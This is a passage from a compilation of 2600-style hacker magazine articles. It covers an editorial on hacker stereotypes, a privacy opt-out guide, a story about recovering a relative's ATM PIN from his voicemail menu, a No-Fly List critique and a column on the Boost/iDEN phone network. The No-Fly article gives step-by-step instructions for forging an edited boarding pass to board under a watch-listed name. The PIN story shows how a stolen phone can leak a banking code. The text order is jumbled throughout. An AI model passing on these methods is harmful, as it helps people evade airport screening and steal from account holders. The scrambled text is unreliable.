all of us to ensure that mistakes of previous administrations aren’t repeated here. Over the years.” As most of us who read these pages already know. That’s when we see if they remain only words. Troubling signs like this make us all the more wary of any promises.” It’s easy to see the negativity in just about all of these entities. they will be tested at the first sign of a crisis. etc. leads those very individuals who participate in this sort of destructive behavior into proudly labeling themselves as hackers. This. While mischievous and not completely within the confines of the law. Many hackers do step over the line. he says. We want to be very clear on this. when these egregious violations are eventually uncovered. We have seen numerous examples of employees within organizations (phone companies. Yet. Just because they use the technology does not mean they appreciate it or comprehend it for anything more than their unimaginative goals. “But every day we see waves of cyber thieves trolling for sensitive information . or even in a garbage dumpster. such people were never malicious or destructive. at the moment.monitoring private sector networks or Internet traffic.I repeat. We know that many people have a problem with those who step outside the rules and we don’t expect ringing endorsements of their behavior. Internet providers.” These are indeed great words but. a misplaced laptop. Without any doubt. Done properly.) who abuse their access and violate privacy. send out a universe of spam. Terms like “digital war” and “cyberterror” are great for sound bites but we need to avoid the tabloid approach in strengthening security or we’ll inevitably wind up with ill-conceived legislation and a lot of misplaced fear. it doesn’t take a hacker to gain unauthorized access to a system. we wind up giving them far more credit than they deserve and the people with the real talent are themselves categorized as criminals. and con men who have always existed and always will.

TransUnion. go to http://www. or a completely false name. It should be noted that telemarketers are not allowed to call cellular phones. To stop receiving these “pre-approved” credit card offers. It is an added layer of protection.. Though I do not condone using such sites. This article will not only help you cut down on the amount of junk mail you receive.” While your circumstances may require that you wish to remain undetectable to government entities and private detectives. as grown and educated adults. The national Do Not Call Registry was established by the federal government to allow consumers to “opt out”2 of marketing telephone calls. are kind enough to allow you to “opt-out” of the sale and sharing of your private information. Businesses are not “consumers. Are you tired of all those “pre-approved” credit card offers in the mail? The three credit reporting bureaus.gov. Even with these exceptions. full birth date. With only a name. you will still be able to stop many annoying and untimely telemarketing calls. The Do Not Call Registry does not apply to businesses. you at least have some degree of control in terms of who has access to what information. and charities/political organizations. OR phone number I can use the Internet to find your legal name. There are a few exemptions from this registry: surveys. but will have no redress against telemarketers if they do call you. if you choose to register your cellular phone. however. When giving your name and address to the government. Please do not misconstrue anything in this article to promote such a callous disregard for the government or the courts. You will need a valid e-mail address to complete the registration process and may enter up to three phone numbers per registration.
Regaining Privacy in a Digital World
by 6-Pack
You would probably be surprised at how much information about you is available to anyone with an Internet connection. Now. Therefore. with only a little bit of work. however. talk to strangers all the time by filling out online forms. or defrauding the government is illegal.com and follow the instructions
The Do Not Call Registry
Opt-Out Prescreen
you will land directly in jail. however. donotcall.gov. I’m not speaking about the data you advertise publicly on sites such as Facebook or MySpace. you can register your business phone numbers to eliminate unwanted and unproductive telemarketing calls. Internet forms and databases do not care which of these “names” you provide them. you can regain some tranquility in your life. even five-year-olds know not to talk to strangers and yet we. Experian. history of all prior residences. It will save you a lot of trouble. businesses you have an established relationship with. and Equifax. although the enforcement only applies to consumers. OR address. I’m not speaking about the data you advertise publicly on sites such as Facebook or MySpace.”1 You may have a birth name. as long as you provide them something. Why not start using a nickname or false name when filling out online forms? After all. but it will also make it harder for the average person to track you down. family members in the same household. They advise you on how to make it difficult for the government and private detectives to track you down. but do not tell you how to make it difficult for “Joe Six-pack. To add your phone number to this registry. go to http://www.optoutprescreen.com. etc. businesses may still register their phone numbers. get an unlisted phone number! The additional $2 a month is not a large sum of money considering the additional privacy benefits of having an “unpublished” number. give the correct one. most of us do not require this level of privacy.. Remember. No passing Go.”3 From my understanding. What is in a name anyway? Webster’s dictionary defines “name” as “a word or symbol used in logic to designate an entity. After all. go to http://www. however. that an unpublished number will only stay private if you keep it private! I will only say this once: do not lie to the government.

people. Then go to http://switchboard. Then go to http://www.acxiom. Call that number from the phone number in the listing and you will be removed. I will not describe each site in detail but will just give a quick description and explanation of how to remove your information. anywho. They claim that it takes two weeks to process your request. Then go to http://yahoo.com/optout. Once you find your listing.” switchboard. who then send you junk mail.” Enter the code word and click “remove me.” Click that button.intelius.com/optout.com. Do not delete this information! Scroll down to the bottom of the page and follow the link to the “online removal form. and whitepages.php. Fill out the form and mail it back to them. most likely 1-732-978-5000. whitepages. anywho.php. “Is this you? Remove your listing.
to “opt-out. and when you typically make those purchases. click on “update listing” under the address shown. are tired of receiving advertisements for products that are uninteresting and leave you wondering how you were lucky enough to be selected for such a fine excrement of mailings in the first place. To “opt-out. Remember to check back and renew your “opt-out” every few years.THE HACKER DIGEST . enter the reason for removal (it doesn’t really matter what reason you choose). They sell your address and provide your likes and dislikes to advertisers.com. ➥html and fill out their form. and your listing will be removed. They expanded to cover individuals as well. how often you purchase it. Three companies alone have the ability to stop the majority of junk mail you receive! To thwart would-be junk mail. Choicepoint Choicepoint sells your address information much like Axicom.”
This section focuses on regular. run-of-the-mill junk mail. An identity thief can easily open your mailbox and snatch these offers while you are not home. go to http://www.privacyatchoicepoint.com. fill the form out with the information contained in the listing. 411. I recommend using a disposable e-mail address (such as from Yahoo! or Hotmail) so that you won’t get bogged down with spam to your main e-mail address. For example.dmachoice. because this option does not require your social security number. The Direct Marketing Association (DMA) The Direct Marketing Association (DMA) is reason number two your mailbox gets cluttered with junk mail.person.com Find your listing. Many people do not realize the security implications of these credit card offers.intelius. To “opt-out” from Choicepoint’s services.com/optout_ext.com Search for your name and click on it in the results. You should definitely “opt-out” from this service!
How to (Not) Find a Person on the Internet
I previously discussed how easy it is for Joe Six-pack to locate you and your loved ones.aol. About halfway down the page you will see a small link that says. fill the form out with the information contained in the listing.yahoo.com.
Marketing and Junk Mail
superpages.com The Superpages are no longer limited to businesses.” go to http://www.org to find out how to remove your name and address from DMA-approved marketers’ databases.intelius.com. Now you will learn how to fight back and regain your independence from the commercial sale of your private4 information. Why take the risk? Besides.com Find your listing. The system will then generate a number.” I recommend using the electronic opt-out that is good for five years. and click “remove me.com Find your listing. I’m sure that you.com/opt-out-request-form and fill out the form listed on that page. phonenumber.” find.com/help/privacy_list. enter the security code. html and enter the phone number that was contained in the listing. and click “remove me. How do they gather this information? You know those barcodes you carry on your keychain (grocery store clubs and the like)? These stores keep tabs on what you buy. Now you know why grocery stores are insistent that you use the free club card to receive 15 cents off your box of cereal. Acxiom sells your information to marketers. do not give a laundry list of previous addresses if a site’s database contains only few of your old addresses. I end up shredding all of these offers to make sure no one can misappropriate them for their own illicit use.

Using the same $50 disposable Visa as described above. com/consumer/optout/submitOptout. Open a new window. Follow the instructions to remove your information to the tee. Therefore. go to http://www.ussearch.com/optout/optout.php (I have excluded the option of paying ZabaSearch $20 to block your record instantly because you can do it for free through the mail). They will remove your listings within a few days.
zabasearch. This way. I searched for everyone I knew to get the most out of my hard-earned money.com If you were like me. the grocery store coupons mentioned above.com/ ➥block_records/block_by_mail. Read all of the checkboxes carefully because one of them is an opt-in for e-mail advertisements. This service may not apply to you. classmates. you have two choices for removing your information: 1. Go to http://www. it leads to the post office. Before undertaking this. but. I subscribed for their 24-hour unlimited pass for $19. Currently. Open a second window and go to http://www. reversephonedetective. Mail the forms to: Attn: Opt-Out Department Service Center 600 Corporate Pointe. ussearch. I did find my brand new post office box attached to my name. so fill out the form multiple times to include all variations.do and search for available PO boxes in your area.us/ ➥remove. intelius.reversephonedetec ➥tive. utility bills.aspx for details. go to http://www.com Enter your phone number and see what information comes up.com This website is not as easy as the others. I used this for the sites I had to subscribe to because I do not want them having my real credit card information. if it does. or they will reject it. Open a new window and go to http://www.do. PO Boxes I recommend getting a PO box for magazine subscriptions. From now on. However. CA 90230 2.zabasearch. I’ll bet that they don’t have it. Any available boxes will include the various sizes and prices. It takes them a while to remove your information. we did remove the information from the hands of the majority of the non-paying public. I went to the local drugstore and purchased a $50 “gift” Visa card. Aside from the daily junk e-mails. I subscribed to the 24-hour unlimited pass for $19. when I was removing myself from the databases mentioned above. daplus. Suite 220 Culver City. Fax the forms to: (310) 822-7898 It takes US Search a while to remove your listing. Now. 
most sites that have your information are pay sites and only the most persistent of people will want to pay for your information. which is impossible.
Ok. and anything else that will likely be sold. All they require is that you print off the listing and send it to them. Once you find your listing. this service has done nothing else for me other than share my name with others (I never filled in the address part).com/privacy.95.aspx and fill out the form with your information. I rented the cheapest box available and it was only $58. so don’t expect results for at least a week. Interestingly. people shouldn’t be attracted to you in the first place.com Here is the tricky part with Intelius: you must subscribe to their service to print the listing to remove yourself.com so that you could keep up to date with class reunions and such.com The removal process is much like for ZabaSearch.95. if you are living a low-key lifestyle. While we did not remove all of your information from the Internet. I could search for all of my family.peoplefinders ➥.
Regain a Private Lifestyle
I only included the address information that they had available on their website. The post office is not supposed to divulge who the renter of a PO box is unless there is a court-issued subpoena or search warrant.classmates.com/cmo/user/remove to remove your account. and fill out the form. PO boxes range from $20 a year (zip code 48820) for the smallest box to $667 a year (zip code 90210) for the largest box.

When you go to the post office to get your new “box o’ privacy. such as some mom-and-pop CB radio outfit. if we don’t tell companies that we feel this is wrong. 4. and never giving up your real address and phone number to “strangers. like Sears or Macy’s). you must have previously registered for a service. Use your PO box! It is sad that society is forcing us to spend our hard-earned money to “opt-out” from services we never elected to enroll in. When filling out the form. I feel. you must remember to use your PO box! Absolutely do not use your home address unless the government or a bank is requesting it. fast. it’s best to order an obscure catalog that they have not likely heard of. Companies only know what you tell them (or what they have purchased from others whom you have told). and pressing a couple of buttons. Box 143 Anytown. Now. but I’ll still use the quotations. fast. For example: Joe Six-pack 123 Postal St. using fictitious names when subscribing to magazines and receiving packages. and other financial institutions to have a physical street address for you. entering some identifying information. we have all gotten lazier and we want our information quick. you should provide your actual street address.” (Black’s Law Dictionary. and unscrupulous tactics that make them a quick dollar by: removing your listings from online databases. Let’s face it.” (For this excuse to work.” you will need to present two forms of identification. Tell them you are tired of their invasive. address. 2006).” I feel that if you wish to opt-out of a service. just order a few more that way to make sure the post office doesn’t complain after the first few. and you are all set. Now for my trick around street addresses. a $2 security deposit on the keys. Remember. Your banks have to tell you how to do this. It usually involves calling a phone number. there is nothing private about your name.com/dictionary/name 2. though. 3. and easy. 
This is the same definition that is used in federal consumer laws. and easy (isn’t that the Internet?). The reason I feel there is a difference is because the average person is not going to want to go through all of that trouble to find the information. http://www. Technically. they will go even further. simply apologize and say that the catalog “required a street address. phone number. USA 00000 Not all post offices will be keen on your use of their address in this way. Since I never registered my phone number with telemarketers. I do this because it is not really an “opt-out.” Even five-year-olds know the importance of not talking to strangers. Who knows what the future holds. I do not feel as if I should have to opt-out for something I never wanted in the first place. After that.) Now that you have put a lot of sweat into hiding your private information from the public. but I do know that we can all do something about it now! 1. If your name pops back up on the websites we worked so hard to take your name off of. Thomson West. You need a driver’s license (or other photo-ID) and another form of ID such as a utility bill. with no intention of resale. You can use that street address along with your box number. use the addressing scheme mentioned above and see if you receive your complimentary catalog. The generally accepted Black’s Legal Dictionary defines “consumer” as “a person who buys goods or services for personal. which address do you think will be listed? You guessed it. there is a vast difference between going to the vital statistics office at a local courthouse to pull up a birth record and typing in a name to retrieve the same information. your PO box. so be nice to your postal employees. what information was presented? The post office name. If you receive it fine. or full birth date. You may feel differently. 
I will reference “opt-out” with quotations. 3rd Pocket Edition.merriam-webster. you realize the importance of not giving up your real address anymore. If you take away the quick. go on the Internet and order a free catalog (it can be from anywhere. Yet grown. When you searched for an available PO box. Call your banks and other financial institutions and inquire about their privacy policies and how to limit the sharing of your information. deceitful. street address. we are left with the public information where it should be. you pay for the box.
Footnotes
Conclusion
Throughout this article. Banks and PO Boxes The IRS requires banks. explained in a minute. in the public courthouse. While I did find a trick around this. If you receive the catalog with a note from the postal employees that you cannot use the address in this manner. brokerage firms. educated adults voluntarily provide whatever information a form asks of them (it’s scary these people actually have the ability to choose our country’s leaders). for some reason. Just because a form asks for something does not mean that it is required. family. and box availability information. even if they act like they should work at the DMV! To test this out.

a nefarious party couldn’t go on a spending spree. as long as you don’t mind me
The Wisdom of Bob
The Story Doesn’t End There
Uncle Bob informed the group of something that showed me just how much he had been keeping up with the current threats to privacy and personal information. “The only place I have things like access codes and passwords written down is on an encrypted disk that I keep in my lawyer’s vault for insurance purposes. Now. Why couldn’t you just reach for your credit card like a normal person?”
Years ago. “That’s not a check card. later. their reaction tends to be priceless. “but what happens if your wallet is stolen by someone who has the ability to discover your PIN number? What steps have you taken to prevent that from happening?” Bob looked at me curiously for a moment.. thus it was an auspicious occasion to have every single aunt. “This is a major security loophole. Bob remarked. “Perhaps I’m a busboy who took your overcoat from that hook on the wall as we were all eating.” my uncle stated with a laugh. if one can succeed in penetrating their defenses. it gave you an unfair timing advantage. but my Uncle Bob simply placed a fold of bills on the waitress’s tray while his brothers were fumbling with plastic.” I stated. and cousin represented at this Christmas Eve dinner.” he remarked. Then he laughed. you would typically be given an ATM Card.
Bob Reveals Nothing
The Challenge
uncle. Not only does cash anonymize his spending. but if his wallet were to be lost or stolen. would allow you to complete certain point-of-sale transactions) with the use of a four-digit PIN number. in which each attempts to pick up the tab. It was at this point that my uncle revealed how very cautious he was being. “I will personally see to it that the biggest-ticket item on your Christmas list is under the tree in your home this year!” “Very well. “Imagine I’m a criminal who has stolen your wallet. “I’m very impressed with your strict attention to security. “and I always demand that a bank issue me an ATM Card specifically. That way. without my PIN number. the card is useless. Bob proceeded to instruct his relatives about the distinction between these two very similar and oft-confused pieces of plastic. What would you say if I told you I could discover your PIN number almost immediately after seeing your ATM card?” “If you can do that. “Nope. most banks issue their customers “check cards” (almost always tied to the VISA Merchant Banking network) which can be used like a debit card (with a PIN) or like a credit card (requiring no PIN). Sean expressed incredulity over this. “Don’t the same risks of electronic records and criminals having a field day in Best Buy’s plasma TV section still apply?” he asked. it’s cash only for me ever since the Patriot Act was signed into law. and I don’t think that the FBI or the NSA is going to take an interest in stealing my money or my identity anytime soon.. our schedules are hectic enough that at least one or two individuals can’t make it back to the east coast for any given holiday. That’s far beyond the reach of the common criminal. it’s an ATM card.” The group was impressed. I expected my father and his four brothers to immediately begin their ritualistic swordplay with credit cards. This mag-stripe token would allow you to withdraw funds (and. when you opened a bank account. Many people looked at the bank-issued plastic in their wallets and vowed to change to a more secure card after the holidays. He explained how he ceased carrying credit cards years ago. “Oh. not wanting to leave any digital trail of his spending habits. This appeared to be imminent. way to get the drop on us. They’re not the same thing.
The Security-Conscious Uncle
by Deviant Ollam
My entire extended family sat gathered at a long table in a fine dining establishment.” I knew that such an assured person often makes the best target for a security challenge. way to get the drop on us. He explained how he ceased carrying credit cards years ago. when you opened a bank account. “Oh.”he told the group. That’s far beyond the reach of the common criminal. it’s an ATM card.” The group was impressed. I expected my father and his four brothers to immediately begin their ritualistic swordplay with credit cards. This mag-stripe token would allow you to withdraw funds (and.. They’re not the same thing..

Bob included. Say hi to your sister for me.. I considered things for a second. and that has to be picked up in person with proper ID. but this feature is always disabled by default. everyone. “Hello? Yes. heh. like so many of these persons.
The Explanation
Making the Call
The Revelation
.” He wore an expression of vindication. It looks like you took your daughter Mary’s birth date of March 6th.” Undaunted. You really do look stunning. “Relax. could you? I knew that was all smoke screen!”
I cracked a wry smile.. can you hand me your phone. yeah. From there. “No. On it were written four simple digits: 3652. Everyone sat breathlessly as I looked it over.. “Ok. I’m not interrupting am I? Oh right. and email accounts. your information is all very safe.. “Hah! You couldn’t discover it.. the system would reveal his access code to anyone holding his handset. Last name is O’Connor and the last four digits of the card number are 8579. When his mobile voicemail stated..THE HACKER DIGEST .. have a safe and happy new year if I don’t talk to you before the first!” I hung up and held the scrap of paper close to my chest.” My family. particularly in the “stolen coat” scenario about which we had hypothesized. web sites. I let the group chatter about in a frenzy for a short while. typically no code is needed.” he said after poking about in system menus for a second. but still.VOLUME 26
revealing this in front of everyone. but it had been for dramatic effect. “That’s strange. Because his voicemail settings weren’t configured for maximum security.. can you do a quick lookup for me? Yeah. But I wagered that Bob.” I explained to the group that what I had done was to simply leverage possession of Bob’s phone to my favor.. That is how Bob’s account was configured. I was referring to the fact that most people simply use their birthday or the birthday of a loved one.” I slid the scrap of paper across the table to Uncle Bob.. assuring me quite plainly that an attempt to social engineer any representatives whom I might reach at the bank’s customer service number would be a wholly useless endeavor. listen. I had accessed the “change personal options” menu. Thanks man. then said. If the individual is entering the voicemail system from their own personal handset device. The entire table set in with a cacophony of questions demanding to know who it was that I called and whether or not all of their own PIN numbers or banking codes were vulnerable. Even a legitimate card holder can only request a new card and PIN.” I took the ATM card and turned it over a couple of times. now sat slackjawed. A criminal grabbing someone’s phone along with their wallet isn’t all that outlandish a prospect. you do take security more seriously than almost anyone I know. reading both the digits on the front and the phone number on the back. I punched away at his phone’s keypad and held it to my ear. Aunt Ellen. Bob?” My uncle passed me his mobile phone. too. So.. but coupled it with what I can only imagine would be your wife’s birth year of 1952. Bob’s mobile provider offers a feature that requires parties enter their personal access code when checking voicemail.. got it. I handed my uncle back his phone and asked him to look at whom I had called. this is an ATM card issued by Commerce Bank. area? 
What if I were on the phone with some black hat teenager in his parent’s basement?” After a moment I picked up a pen left on the table by the waitress and started scribbling on a scrap of paper. “They’re trained specifically to never reveal anyone’s PIN number.. Bob looked absolutely stunned. You don’t seem to have done that. there was a bit of a smokescreen employed. Then I couldn’t keep up the act anymore. while pretending to have a conversation with a high-tech security expert. I wouldn’t have placed you anywhere near 50. your family doesn’t get together until tomorrow.C. and I wasn’t speaking to anyone about whom you should be concerned..” I knew that the odds were very good that these same four digits would allow me to clear out his bank account from almost any ATM! And I was right. Was I speaking to a friend at an investigative business of some sort? Or a spooky individual in the greater D. it’s not even sent through the mail. fails to be as unpredictable when constrained to four character places and the use of strictly numbers asv opposed to alphanumerics. “Indeed. “I’d like to make one call.. let me have a look at that card.. it’s me. “Your current passcode is three six five two.. The most security-conscious citizens often use a whole host of various passwords for computer systems. The rest of the family looked on as I conducted a brief conversation. I had simply dialed my Uncle’s voicemail and. Who in the world could I be calling? They knew I had some very interesting friends in the security world. Uncle Bob. “This only shows a call to my voicemail. I stopped trying to stifle my laughter and my deadpan expression broke down into riotous chuckling..” I explained that Bob was right.. selecting the “choose a new passcode” feature resulted in the automated voice on the other end of the line telling me what my current passcode was..
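The point buried in the story above is that four numeric digits give at most 10,000 codes, and a PIN built from a birthday or a birth year is drawn from a far smaller set that anyone who knows the family can enumerate. The following is an added example, not code from the article: it counts how much of the 4-digit space reads as a date, and implements the policy check a voicemail or ATM provider could apply to refuse a PIN derivable from the holder's own known dates, including the trick of pairing one person's month and day with another person's birth year. The family dates are constructed for illustration; only the code 3652 (March 6 plus 1952) comes from the story.

```javascript
// Added example (not code from the article): why a four-digit numeric PIN
// built from memorable dates is weak, and a policy check that refuses such PINs.
// The dates below are constructed; only "3652" (March 6 + 1952) is from the story.

const DAYS_IN_MONTH = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31];

function isValidMonthDay(month, day) {
  return month >= 1 && month <= 12 && day >= 1 && day <= DAYS_IN_MONTH[month - 1];
}

// Count the PINs in 0000..9999 that read as MMDD, DDMM or a year 1900..2099.
function countDateLikePins() {
  let count = 0;
  for (let n = 0; n < 10000; n++) {
    const pin = String(n).padStart(4, "0");
    const a = Number(pin.slice(0, 2));
    const b = Number(pin.slice(2));
    if (isValidMonthDay(a, b) || isValidMonthDay(b, a) || (n >= 1900 && n <= 2099)) {
      count++;
    }
  }
  return count; // 764 of 10000, roughly 7.6% of the space
}

const pad2 = (x) => String(x).padStart(2, "0");

// Every four-digit code derivable from the holder's known dates, including the
// story's pairing of one person's month/day with another person's year.
function derivedPins(dates) {
  const pins = new Set();
  for (const d of dates) {
    pins.add(pad2(d.month) + pad2(d.day)); // MMDD
    pins.add(pad2(d.day) + pad2(d.month)); // DDMM
    pins.add(String(d.year));              // YYYY
    for (const y of dates) {
      const yy = pad2(y.year % 100);
      pins.add(pad2(d.month) + yy);        // MMYY
      pins.add(pad2(d.day) + yy);          // DDYY
      const mdyy = String(d.month) + String(d.day) + yy; // unpadded M, D, then YY
      if (mdyy.length === 4) pins.add(mdyy);
    }
  }
  return pins;
}

// Policy check: reject a PIN that any of the holder's known dates would produce.
function isWeakPin(pin, knownDates) {
  if (!/^\d{4}$/.test(pin)) throw new Error("PIN must be exactly four digits");
  return derivedPins(knownDates).has(pin);
}

// Constructed family dates: daughter born 1979-03-06, wife born 1952-05-20.
const FAMILY_DATES = [
  { year: 1979, month: 3, day: 6 },
  { year: 1952, month: 5, day: 20 },
];

console.log(countDateLikePins());             // 764
console.log(isWeakPin("3652", FAMILY_DATES)); // true
console.log(isWeakPin("7391", FAMILY_DATES)); // false
```

The date-like count only covers three literal patterns; once month/day/year fragments of several relatives are combined, as in the story, the candidate set for one household runs to a few dozen codes, which is why a provider that knows the account holder's birth date should refuse PINs derived from it rather than rely on the customer choosing well.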

THE HACKER DIGEST .S. along with a statistical analysis done by researchers at MIT. In effect. they can send the people who they know are not on the lists. but there’s no reason to think that it has been successful or even useful in preventing terrorist attacks. Since she does not scan the barcode on the boarding pass and pull up the passenger name record from the airline’s database. He then prints out a second boarding pass with his real name on it. assuming the TSA has enough staff at a certain airport to give intensive physical searches to 8% of travelers passing through the security checkpoint. For the purpose of this example I will use “Ahmed Mohammed. they are going to find out if they are either on the No-Fly List. let us assume that you have the name of a terrorist or someone else on the list. the fact that this massive security flaw has existed for the past five years shows that the No-Fly list is a government attempt to collect information about its citizens or to provide a false sense of security. Perhaps the TSA will start scanning the barcodes on boarding passes at the security checkpoint. Here’s how: Ahmed buys a plane ticket in a false name. it seems likely that they could figure this out too. more that half of the TSA’s screening staff are wasted on doing Selectee List screenings. allowing the terrorist cell to be more than twice as likely to get their member through security without additional screening. along with his real ID. which would be the case if all searches were done at random. Either way.S. As a practical example on how to render the no-fly list completely useless. proves that it is only creating a false sense of security. In fact. the cell can send their members on “scout missions” in order to see who is given extra screening and who is not. Since terrorists generally don’t act alone and usually are part of a cell. she has no way of telling whether the boarding pass has the right name on it. rather than increases. he simply
. which doesn’t prevent a person from flying but requires him or her to undergo additional physical searches) are classified by the U. causing these unfortunate people many hours of delays and paperwork to get their names off the lists. where he puts away his fake boarding pass and takes out his legitimate one in the name of John Smith. Several years ago. in which case they will not be allowed to fly. since he knows that the airline’s agent will ask to see his ID when they attach the baggage ticket.” once a person actually buys a ticket and tries to fly. he checks in online and prints out his boarding pass in the name of John Smith. which the agent scans and sees the name of John Smith appear on the computer. Ahmed proceeds through the security screening and to the gate. in which case they will find a row of S’s conveniently printed on their boarding pass and will get extra special attention at the security checkpoint. easily. and even those with top secret security clearances have all appeared on the secret list. However. He proceeds directly to the security screening with his carry-on luggage and when the TSA agent asks for his boarding pass and ID. He also saves a copy of the HTML file for the boarding pass to his computer.
The U. he shows his fake boarding pass with his real name on it. such as John Smith. some students at MIT published an analysis entitled “The Carnival Booth.” an actual terrorist name listed on the FBI most wanted list. “No-Fly List” has been in effect for over five years now. there is just cause to think that the list makes us less secure. as it was designed to do. When Ahmed gets to the airport. But does the list really accomplish anything? A simple and practical way of circumventing the list. Since the gate agent does not check IDs at boarding. for the past five years we Americans have been sacrificing our privacy and security with a sham system that decreases. government. This means that when the terrorist cell actually carries out an attack. When the gate agent calls everyone to board. The TSA agent looks at both. In spite of the list being “classified. scribbles her initials on the fake boarding pass and thinks she has just done her part as a good American to stops terrorists in their tracks. American soldiers. and those people will only have a 3% chance of being searched instead of an 8% chance. The names of people on the lists (the No-Fly list and the Selectee list. cannot be challenged in a court of law. or both. our air travel security. or on the Selectee List. he does not check any baggage. Ahmed has successfully boarded the plane even though his name is on the “No-Fly List.” Their purpose was to show that having a No-Fly list actually decreases security instead of increasing it. then if 5% of passengers are selected for an intensive search based on the fact that their name appears on the “Selectee List. The names of babies. Can you still board an airplane even though your name is on the No-Fly list? Yes. The summary of the paper is that. or requiring the gate agent to check IDs. then changes the HTML in a text editor so that his real name appears in place of John Smith.VOLUME 26
by cbsm2009
Why the “No-Fly List” is a Fraud
presents the real boarding pass. she has no way of knowing that the ticket holder’s real name is Ahmed Mohammed. Within 24 hours before the flight. and are compiled from unknown sources.” then that leaves only 3% of passengers who are subjected to a truly random search.” Considering that terrorists were capable enough to fly a few jumbo jets into the World Trade Center and the Pentagon.

and like other mobile phone services.x. Picture Mail. So it’s probably appropriate that this is today’s setting for the ugliest gutter trash bastard child of telephony. Nextel literally went from city to city buying dispatch companies and similar businesses. It’s less clear now whether the spectrum swap deal was as good for Sprint as analysts initially assumed. Visit Pioneer Square any weekend. meaningful dialogue: “YO CRACK DAWG WHERE U AT??? I LOOKIN’ FOR DA FEMALES!” iDEN is a proprietary standard first commercially deployed in 1994 on the Nextel network. but legally they aren’t. And then they proceeded to do almost nothing with it. and a “Walkie Talkie” number (used for trunked radio). the network was already suffering from capacity limitations. but is always in the 10. the SMR spectrum on which Nextel operated was adjacent to numerous public safety frequencies. Incidentally. This process was completed in the summer of 2008. which is in the format 112*nxx*xxxxx. The brand did very well under independent management.x. Nextel operates in 800-900MHz spectrum called “SMR. the Nextel network (which was already capacity constrained) began to experience serious problems with dropped calls. This is because coverage on the iDEN network is limited to Nextel’s native footprint and roaming is only available (at extra cost) on a few select foreign carriers in North and South America.VOLUME 26
Telecom Informer
by The Prophet
Hello. When Sprint bought Nextel in 2005. However.
. making the service less expensive for Sprint to offer. this was certainly the case. etc. Nextel users began leaving Sprint in droves. On this gorgeous day. they signed a wholesale Mobile Virtual Network Operator (MVNO) arrangement with Boost Mobile. and incoming calls delivered straight to voicemail. While Nextel was still an independent company. It ended near Pioneer Square.” which was originally intended for the purpose of taxi dispatch systems. the dust had finally settled from rebanding mayhem .but there were hardly any Nextel customers left to care. the Motorola iDEN system. Meanwhile. or if I’m just the only sucker who was willing to take the job. The very concept of Skid Row was invented in Seattle. Boost does not offer a talk group feature. Sprint acquired the Boost brand and brought it in-house. After protracted negotiations. the most beautiful time of the year here in the Pacific Northwest. Additionally. During rebanding. prompting numerous. and young twentysomethings living the Thug Life are everywhere. system busy messages. Predictably. and walkie-talkie services. a prepaid lifestyle brand focusing on young urban customers. urgent complaints to the FCC by public safety agencies. Sprint agreed to vacate portions of the SMR spectrum (through a process called “rebanding”) in exchange for vast swaths of RF spectrum in the 900MHz and 1800MHz bands. iDEN handsets look like cellular phones and quack like cellular phones. The IP address is used by the mobile browser. This plan offers “all you can eat” access to voice. in the second quarter of 2009. data. today the center of Seattle’s nightlife. Using the “Walkie Talkie” number. Shortly after the Sprint-Nextel merger. However. Sprint launched the Boost Monthly Unlimited plan. no roaming is available. which was called Boost. Literally everything is covered except for international usage. on average more than one million customers per quarter. 
Nextel built the first nationwide mobile telephone network free of roaming charges. an IP address (assigned whether or not you subscribe to data service). I’m beginning to wonder if I’m the only technician left in the state who still knows how to fix anything. limiting the utility of this feature. By early 2009. There is also a PSTN telephone number. their Boost Mobile iDEN handsets chirping away in profound. and at half the price of similar “unlimited” services. Bing Crosby once sang that the bluest skies he’d ever seen are in Seattle. and welcome to the Central Office! Spring has turned into summer once again. construction radios. text. The iDEN network resulted in considerable interference to users of these frequencies. However. They are trunked business radios with the ability to make phone calls. To acquire its spectrum.x IP space (which is non-routable). and quickly grew to become one of the largest MVNOs in the country. The general consensus at the time was that Sprint made out like a bandit on the deal.THE HACKER DIGEST . Sprint had a largely moribund business to contend with. Boost handsets have a telephone number. Boost handsets are capable of trunked radio communication with any Boost or Nextel handset (along with select foreign iDEN carriers). In this manner. most of which I spent in the Westin Building working on a troublesome tandem trunk. finding itself with plenty of spare unused iDEN capacity.

Even on the least expensive prepaid rate plan. the time has come once more for me to go. Like most prepaid wireless carriers. Voicemail is available. Another unusual feature allows you to configure your handset so it automatically answers after a specified number of rings. it is not necessary to have a data plan for this feature to work (an important distinction. Based at a former nuclear missile silo. music. many users have reported that it is possible to activate it on an iDEN Boost plan (such as Monthly Unlimited). Performance is also slower than with most other mobile carriers. The wIDEN 2. Inexplicably. billing while the call is on hold) so you can place another call in the background.toorcamp. and uses the MMS standard for backhaul. I’ll see you there! http://www. it is suitable for shell access and email. it appears that this project has been mothballed.Download link for Windows iDEN driver used for packet data tethering.and this interval is. but the 40404 (Twitter) short code does not work. And with that. and is a 2G data service.boostmobile. As of this writing. International calling rates are better than most prepaid carriers.org – Toorcamp – North America’s first ever full-scale hacker camp! 4th of July weekend. and fun projects. as is the case with MO-SMS on CDMA and SMS on GSM). 2009.4Kbps peak. neither configurable nor adjustable by Customer Service. but it answers after just three rings .com/matt/files/ ➥nextel/techover. You can then switch back and forth between calls. an iDEN plan on this network provides exceptional value (unlimited calls. iDEN data runs at approximately 14. and many representatives do not know how to accomplish this. because messages must be uploaded and downloaded via packet data (rather than by using spare capacity in the control channel. and no roaming is allowed.5G standard allows for 144Kbps peak. and it’s time to put the finishing touches on the Toorcamp main stage! Incidentally. 
allowing you to forward calls to another number either immediately or after a specified pause.zip . Boost iDEN supports an unusual feature allowing you to place the active call on hold (of course. Although coverage is limited to the native Sprint CDMA network. However. strangely. the 466453 (GOOGLE) short code has been enabled. iDEN does not allow for simultaneous voice and data usage. users must contact Customer Service to have it specifically enabled.com – Boost Mobile official site http://webaugur.pdf . http://idenphones. Caller ID is available. and 1xEV-DO data service). Sprint deployed wIDEN in major metropolitan areas between 2007 and 2008 and tested it for several months. For a brief period in mid-2008. To Art Brothers and the great folks at the Beehive Telephone Company. Boost users with certain handsets (such as the i425) are able to achieve a tethered connection to a Windows laptop. SMS. but stay out of trouble. one need only install the Motorola iDEN driver. because for all plans except Monthly Unlimited. data transmission stops in the interim. thanks very much for your hospitality! I do hope to visit one of your solar powered Central Offices To ThoughtPhreaker. Customers requiring high speed data services are steered to 1xEV-DO handsets on the CDMA network. This was discontinued in early 2009.8. data service costs 35 cents per day regardless of actual usage). This is surprisingly easy. While the experience is very low bandwidth. although STi Mobile (a Sprint CDMA MVNO) offers better pricing overall. Boost offers international calling.THE HACKER DIGEST . connect the handset to the laptop using a USB cable. only available for Monthly Unlimited plan subscribers. Although speeds are slow.Motorola iDEN technical specification. incredibly. 